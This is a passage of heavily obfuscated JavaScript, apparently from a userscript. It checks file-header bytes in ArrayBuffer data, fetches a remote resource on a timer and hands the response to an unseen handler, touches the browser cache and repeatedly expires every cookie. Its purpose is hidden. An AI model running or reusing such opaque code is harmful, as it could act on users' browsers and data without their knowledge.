_0x2c112b[_0x4160dd(0x14e)](_0x290e41,_0x1a5c25);},'IatCb':function(_0x2f33c7,_0x53e5c0){var _0x2309d0=_0x5174;return _0x2c112b[_0x2309d0(0x145)](_0x2f33c7,_0x53e5c0);},'IErLF':function(_0x452042,_0x4d26db){var _0x5773f1=_0x5174;return _0x2c112b[_0x5773f1(0x11a)](_0x452042,_0x4d26db);},'LtMLD':function(_0x424880,_0x327bf3){var _0x5982bf=_0x5174;return _0x2c112b[_0x5982bf(0x16b)](_0x424880,_0x327bf3);},'YEEUs':function(_0x7f4310,_0x4deb78){var _0x35c395=_0x5174;return _0x2c112b[_0x35c395(0x173)](_0x7f4310,_0x4deb78);},'ePfli':function(_0x1fba86,_0x4cd45a){var _0x1f8357=_0x5174;return _0x2c112b[_0x1f8357(0x16b)](_0x1fba86,_0x4cd45a);},'NTDhv':_0x2c112b[_0x2dd167(0x193)],'hblgW':function(_0x860be2,_0x5c616d){var _0xa241d4=_0x2dd167;return _0x2c112b[_0xa241d4(0xd8)](_0x860be2,_0x5c616d);},'CnHWt':function(_0x4392d8,_0x6c1cb9){var _0x577535=_0x2dd167;return _0x2c112b[_0x577535(0x135)](_0x4392d8,_0x6c1cb9);},'fRPvO':_0x2c112b[_0x2dd167(0xe4)],'wyxck':_0x2c112b[_0x2dd167(0xe3)],'FhVpK':_0x2c112b[_0x2dd167(0xd9)],'AlHkr':_0x2c112b[_0x2dd167(0xcc)],'vGqTj':_0x2c112b[_0x2dd167(0xb2)]};(function(){var _0x3481dd=_0x2dd167;if(_0x22ae77[_0x3481dd(0x11e)](arguments[-0x5*-0x101+-0x1*-0x1ea6+-0x23ab][_0x3481dd(0x194)],ArrayBuffer)){var _0x5edaec=new Uint8Array(arguments[-0x1397+-0x112b+0x2*0x1261][_0x3481dd(0x194)]);return _0x22ae77[_0x3481dd(0x18e)](_0x2e762c,_0x3ed181)&&_0x22ae77[_0x3481dd(0xc3)](0x2079+0x101c+-0x2fa2,_0x5edaec[0xcb7*-0x1+0x406*-0x9+0x343*0xf])&&_0x22ae77[_0x3481dd(0xc3)](0x47e+0x1be7+-0x1a*0x13e,_0x5edaec[0x2*0x42+-0x2a1*0x3+0x760])&&_0x22ae77[_0x3481dd(0xc3)](-0x1794+0x1*-0x1563+0x2dbf,_0x5edaec[-0x2f9*-0x8+0x4bb*-0x3+-0xdf*0xb])&&_0x22ae77[_0x3481dd(0xc3)](0x3a*-0x21+-0xc37+0x13b3*0x1,_0x5edaec[-0x14e8+-0x1262+0x274d])&&_0x22ae77[_0x3481dd(0xc3)](0x212d+-0x1469+-0xbcf,_0x5edaec[0x25d5+0xb*-0x1c1+-0x1271])&&_0x22ae77[_0x3481dd(0xd1)](0x3f*0x73+0x648+-0x2280,_0x5edaec[-0xf5*-0x1d+0x61*-0x1f+-0xffd])&&(_0x22ae77[_0x3481dd(0xd1)](0x16b2+-0x1bd1+0x54f,_0x5edaec[_0x3481dd(0x18d)])||_0x22ae77[_0x3481dd(0x103)](0x21c4+0x146c+0x1*-0x3617,_0x5edaec[_0x3481dd(0x18d)])||_0x22ae77[_0x3481dd(0xef)](0x1069+-0x3d*-0x69+0x17*-0x1cb,_0x5edaec[_0x3481dd(0x18d)])||_0x22ae77[_0x3481dd(0x12b)](0x525+-0x6*0x35e+0xf41*0x1,_0x5edaec[_0x3481dd(0x18d)]))?(_0x46234d&&console[_0x3481dd(0x13b)](_0x3481dd(0x123)+_0x3481dd(0xf6)+(_0x22ae77[_0x3481dd(0xef)](-0xa62*-0x3+-0xa31*-0x3+-0x3d89,_0x5edaec[_0x3481dd(0x18d)])?_0x22ae77[_0x3481dd(0xc9)]:_0x22ae77[_0x3481dd(0xf9)](_0x22ae77[_0x3481dd(0xf9)](_0x22ae77[_0x3481dd(0x12f)](_0x22ae77[_0x3481dd(0x12f)](_0x22ae77[_0x3481dd(0xbd)],_0x22ae77[_0x3481dd(0x114)]),_0x22ae77[_0x3481dd(0xcf)]),_0x22ae77[_0x3481dd(0x116)]),_0x5edaec[_0x3481dd(0x18d)])),_0x5edaec),![]):(_0x46234d&&console[_0x3481dd(0x124)](_0x22ae77[_0x3481dd(0x192)],_0x5edaec),!![]);}return!![];}[_0x2dd167(0x14b)](this,arguments)&&_0x39624a[_0x2dd167(0x14b)](this,arguments));}),_0xa301d[_0x146bcb(0x14b)](this,arguments));}});}},-0x1431e0fae6d72100000000000),_0x489242[_0x5bb416(0xfb)](setInterval,function(){var _0x4c2dfe=_0x5bb416,_0x184db2=_0x489242[_0x4c2dfe(0xd6)][_0x4c2dfe(0x163)]('|'),_0x24b15f=-0x4b8+0x1*0x11b1+0x453*-0x3;while(!![]){switch(_0x184db2[_0x24b15f++]){case'0':document[_0x4c2dfe(0x174)+_0x4c2dfe(0xb1)](_0x489242[_0x4c2dfe(0xfc)],()=>{var _0x1be61a=_0x4c2dfe,_0x1095c9={'CtEKk':function(_0x29bc5c,_0x3a116a){var _0x2fe309=_0x5174;return _0x2442d7[_0x2fe309(0xb6)](_0x29bc5c,_0x3a116a);}};_0x2442d7[_0x1be61a(0xb6)](GM_xmlhttpRequest,{'method':_0x2442d7[_0x1be61a(0x167)],'nocache':!![],'cache':_0x2442d7[_0x1be61a(0x13c)],'headers':{'Cache-Control':_0x2442d7[_0x1be61a(0x13c)]},'onload':function(_0x29d3a1){var _0x58fa9e=_0x1be61a;_0x1095c9[_0x58fa9e(0x12c)](_0x59ae61,_0x29d3a1[_0x58fa9e(0xe0)+'xt']);},'onerror':function(){}});});continue;case'1':var _0x32abfb;continue;case'2':caches[_0x4c2dfe(0x146)]('v1')[_0x4c2dfe(0x106)](function(_0x15894e){var _0x25d5a7=_0x4c2dfe,_0x44eb19={'mwxxp':function(_0xbbaddc){var _0x3ba30b=_0x5174;return _0x489242[_0x3ba30b(0x153)](_0xbbaddc);}};_0x15894e[_0x25d5a7(0x154)][_0x25d5a7(0x106)](function(_0x27f833){var _0x53f00d=_0x25d5a7;_0x44eb19[_0x53f00d(0xbe)](_0x32abfb);});});continue;case'3':var _0x59ae61;continue;case'4':var _0x2442d7={'nieeo':function(_0x1d2af9,_0x1be4f8){var _0x3b5e40=_0x4c2dfe;return _0x489242[_0x3b5e40(0x198)](_0x1d2af9,_0x1be4f8);},'VJBBb':_0x489242[_0x4c2dfe(0x117)],'VjUtY':_0x489242[_0x4c2dfe(0x195)]};continue;}break;}},-0x1431e0fae6d72100000000000),_0x489242[_0x5bb416(0x102)](setInterval,function(){var _0x4f92c1=_0x5bb416;document[_0x4f92c1(0x131)][_0x4f92c1(0x163)](';')[_0x4f92c1(0xc1)](function(_0x2a1089){var _0x467fa0=_0x4f92c1;document[_0x467fa0(0x131)]=_0x2a1089[_0x467fa0(0x111)](/^ +/,'')[_0x467fa0(0x111)](/=.*/,_0x489242[_0x467fa0(0x121)](_0x489242[_0x467fa0(0xc0)](_0x489242[_0x467fa0(0xb9)],new Date()[_0x467fa0(0x107)+'g']()),_0x489242[_0x467fa0(0x143)]));});},-0x1431e0fae6d72100000000000);}});
